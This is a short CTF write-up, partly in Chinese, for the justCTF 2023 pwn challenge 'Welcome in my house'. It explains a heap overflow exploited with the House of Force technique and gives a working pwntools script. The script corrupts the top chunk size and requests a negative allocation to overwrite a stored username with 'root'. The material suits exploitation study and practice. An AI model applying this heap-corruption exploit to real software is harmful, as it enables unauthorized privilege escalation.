justctf 2023 pwn Welcome in my house
堆溢出,可以申请任意大小的size,所以可以使用house of force
然后这里user需要为root才可以得到flag,user默认是admin并存放在一个chunk里,但是可以利用house of force申请到存放user的chunk那里,改成root,最后2即可得到flag
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './house'
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def dbgg():
raw_input()
menu = '>> '
dbgg()
r.sendlineafter(menu, '1')
r.sendlineafter('Enter username: ', 'z1r0')
p1 = b'root'.ljust(0x10, b'\x00') + p64(0) + p64(0xFFFFFFFFFFFFFFFF)
r.sendlineafter('Enter password: ', p1)
r.sendlineafter('Enter disk space: \n', str(-0xa0))
r.sendlineafter(menu, '2')
r.interactive()